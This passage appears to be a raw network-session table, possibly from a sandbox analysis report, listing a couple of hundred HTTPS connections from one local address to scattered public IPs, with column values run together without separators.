                                            21617192.168.2.1549700105.74.3.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21618192.168.2.1556576211.210.240.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21619192.168.2.1553296101.66.97.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21620192.168.2.154881018.109.37.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21621192.168.2.1546624163.119.194.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21622192.168.2.1557598141.144.249.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21623192.168.2.153699827.139.1.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21624192.168.2.1547428205.242.109.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21625192.168.2.1544334217.124.118.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21626192.168.2.1558414148.70.42.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21627192.168.2.15473149.179.172.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21628192.168.2.1545604155.181.85.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21629192.168.2.1536494149.205.86.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21630192.168.2.155131475.20.26.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21631192.168.2.1556592153.113.214.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21632192.168.2.1536836119.244.230.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21633192.168.2.1554302220.162.199.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21634192.168.2.1533092199.60.96.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21635192.168.2.155848892.118.91.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21636192.168.2.1560210133.62.39.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21637192.168.2.1534860112.196.82.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21638192.168.2.15343985.192.49.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21639192.168.2.1541798106.1.140.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21640192.168.2.1559544163.121.111.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21641192.168.2.1534738137.77.34.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21642192.168.2.155476240.98.32.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21643192.168.2.1548434156.0.209.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21644192.168.2.1541162160.184.93.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21645192.168.2.1552736207.113.130.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21646192.168.2.153319079.222.149.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21647192.168.2.1550814189.75.71.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21648192.168.2.154589879.251.213.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21649192.168.2.1552440198.196.217.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21650192.168.2.155378098.194.212.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21651192.168.2.153451040.11.7.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21652192.168.2.1537888183.233.245.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21653192.168.2.154948445.251.191.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21654192.168.2.155507875.129.219.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21655192.168.2.153684874.145.186.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21656192.168.2.155935219.66.93.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21657192.168.2.155975498.19.37.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21658192.168.2.1558610180.58.172.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21659192.168.2.153655272.111.247.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21660192.168.2.1556012160.99.46.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21661192.168.2.154836042.60.208.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21662192.168.2.15572324.236.159.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21663192.168.2.1553670132.148.73.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21664192.168.2.1554320139.65.228.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21665192.168.2.1540546168.188.238.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21666192.168.2.1551836111.176.116.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21667192.168.2.1540864145.142.178.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21668192.168.2.153919834.149.236.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21669192.168.2.153401892.194.45.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21670192.168.2.1547624194.235.95.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21671192.168.2.156032412.81.235.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21672192.168.2.15497509.94.54.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21673192.168.2.1543542209.64.166.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21674192.168.2.155964478.27.118.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21675192.168.2.155193447.7.16.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21676192.168.2.153999819.23.200.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21677192.168.2.1550954142.15.105.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21678192.168.2.1550024146.61.74.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21679192.168.2.1538666203.185.38.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21680192.168.2.1533930191.181.242.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21681192.168.2.154908232.53.173.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21682192.168.2.1548894178.171.56.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21683192.168.2.1538306217.112.129.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21684192.168.2.1547472117.20.120.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21685192.168.2.1554858208.183.115.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21686192.168.2.1547514190.157.104.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21687192.168.2.1540812223.168.237.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21688192.168.2.155423088.235.179.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21689192.168.2.1546410104.83.176.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21690192.168.2.1545528219.128.234.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21691192.168.2.15456088.51.70.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21692192.168.2.155608065.75.44.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21693192.168.2.1532772148.177.49.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21694192.168.2.15601141.20.66.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21695192.168.2.155390661.250.107.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21696192.168.2.1541276220.251.9.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21697192.168.2.1543658113.205.42.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21698192.168.2.153385273.197.250.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21699192.168.2.153618081.135.238.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21700192.168.2.153573439.95.68.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21701192.168.2.1552862132.138.204.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21702192.168.2.154551845.91.235.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21703192.168.2.153587465.107.10.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21704192.168.2.155370496.103.169.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21705192.168.2.1535516202.248.57.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21706192.168.2.153284839.219.58.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21707192.168.2.155261687.233.146.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21708192.168.2.15462809.246.18.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21709192.168.2.154984841.244.10.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21710192.168.2.1551436133.44.222.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21711192.168.2.1546892211.101.108.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21712192.168.2.1556612151.106.14.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21713192.168.2.1535936158.220.231.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21714192.168.2.1543940186.191.148.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21715192.168.2.155671265.30.204.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21716192.168.2.153635295.252.55.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21717192.168.2.1556816174.145.106.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21718192.168.2.156007252.164.207.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21719192.168.2.1545352210.58.103.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21720192.168.2.155820480.126.131.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21721192.168.2.155160074.183.78.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21722192.168.2.1560948164.198.140.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21723192.168.2.154405283.130.60.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21724192.168.2.1542892139.55.35.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21725192.168.2.15495868.21.211.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21726192.168.2.1559794205.158.189.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21727192.168.2.1544254221.82.121.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21728192.168.2.155636290.206.251.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21729192.168.2.154808834.254.37.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21730192.168.2.155206097.114.90.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21731192.168.2.154101434.211.246.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21732192.168.2.153685494.45.60.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21733192.168.2.1557014125.48.65.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21734192.168.2.1548118153.34.66.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21735192.168.2.154465047.205.146.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21736192.168.2.1546720179.1.14.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21737192.168.2.1554200156.126.234.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21738192.168.2.1533068179.6.69.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21739192.168.2.154468898.58.6.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21740192.168.2.153472677.133.222.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21741192.168.2.1553490152.59.33.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21742192.168.2.153699664.172.228.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21743192.168.2.154836823.29.120.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21744192.168.2.1558584153.190.99.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21745192.168.2.15544384.176.105.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21746192.168.2.1537324135.130.106.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21747192.168.2.15410704.187.133.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21748192.168.2.1548794103.190.125.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21749192.168.2.153675220.22.114.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21750192.168.2.1546838103.186.23.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21751192.168.2.1551972178.150.229.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21752192.168.2.1554126172.254.112.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21753192.168.2.154761466.54.115.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21754192.168.2.1551614115.113.206.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21755192.168.2.155856646.55.30.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21756192.168.2.1540698119.96.9.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21757192.168.2.1533584149.151.100.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21758192.168.2.1550344209.76.182.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21759192.168.2.1545728149.110.254.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21760192.168.2.154005658.46.97.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21761192.168.2.1539986182.113.100.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21762192.168.2.1535338197.78.136.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21763192.168.2.1554924135.70.209.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21764192.168.2.1537452190.99.42.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21765192.168.2.153380489.26.119.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21766192.168.2.155825861.36.179.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21767192.168.2.155802076.95.195.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21768192.168.2.1543308179.96.120.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21769192.168.2.1536566152.12.168.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21770192.168.2.154904620.93.128.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21771192.168.2.154696423.194.156.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21772192.168.2.1541370147.48.52.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21773192.168.2.1537276211.73.73.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21774192.168.2.1560176166.160.45.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21775192.168.2.153793866.16.41.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21776192.168.2.1545824191.238.128.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21777192.168.2.1545002165.36.80.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21778192.168.2.1541294176.62.137.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21779192.168.2.1533394135.81.129.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21780192.168.2.1540066196.130.34.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21781192.168.2.1560034136.36.185.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21782192.168.2.153358298.151.200.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21783192.168.2.153794042.123.224.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21784192.168.2.155428470.175.234.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21785192.168.2.155397620.241.62.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21786192.168.2.1543436167.212.54.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21787192.168.2.154931064.213.156.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21788192.168.2.1543026203.76.226.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21789192.168.2.1556182101.102.141.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21790192.168.2.1549644122.219.41.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21791192.168.2.155418453.211.13.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21792192.168.2.15506728.93.156.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21793192.168.2.1538134178.169.47.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21794192.168.2.1538238187.158.62.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21795192.168.2.155770618.49.255.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21796192.168.2.1538596153.69.123.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21797192.168.2.1557336204.96.152.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21798192.168.2.153609252.135.170.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21799192.168.2.1540350181.55.131.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21800192.168.2.15438209.235.58.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21801192.168.2.1535670165.54.169.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21802192.168.2.1541340103.234.25.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21803192.168.2.154023043.96.29.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21804192.168.2.1546268210.179.159.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21805192.168.2.1545916194.221.41.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21806192.168.2.1543476184.187.47.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21807192.168.2.155992687.93.186.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21808192.168.2.1547896162.7.52.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21809192.168.2.1548268102.102.139.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21810192.168.2.1557424166.241.56.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21811192.168.2.1545562158.48.234.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21812192.168.2.154105413.140.185.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21813192.168.2.154476831.84.206.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21814192.168.2.155103494.105.194.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21815192.168.2.155457642.36.42.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21816192.168.2.1556084188.60.127.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21817192.168.2.155522449.228.225.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21818192.168.2.156042666.104.217.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21819192.168.2.155905872.2.229.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21820192.168.2.1536392143.39.149.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21821192.168.2.153480047.50.243.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21822192.168.2.154675851.19.4.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21823192.168.2.1556452182.82.37.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21824192.168.2.1557188148.177.153.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21825192.168.2.155455051.187.74.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21826192.168.2.1539748216.239.128.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21827192.168.2.1560690111.32.63.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21828192.168.2.155366643.221.205.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21829192.168.2.1542690171.10.197.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21830192.168.2.155570261.80.8.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21831192.168.2.154749413.213.164.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21832192.168.2.155851839.21.2.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21833192.168.2.154489239.131.157.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21834192.168.2.1554132138.240.133.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21835192.168.2.1538724171.186.207.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21836192.168.2.1546768221.57.68.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21837192.168.2.1549738116.157.35.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21838192.168.2.1560222101.103.222.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
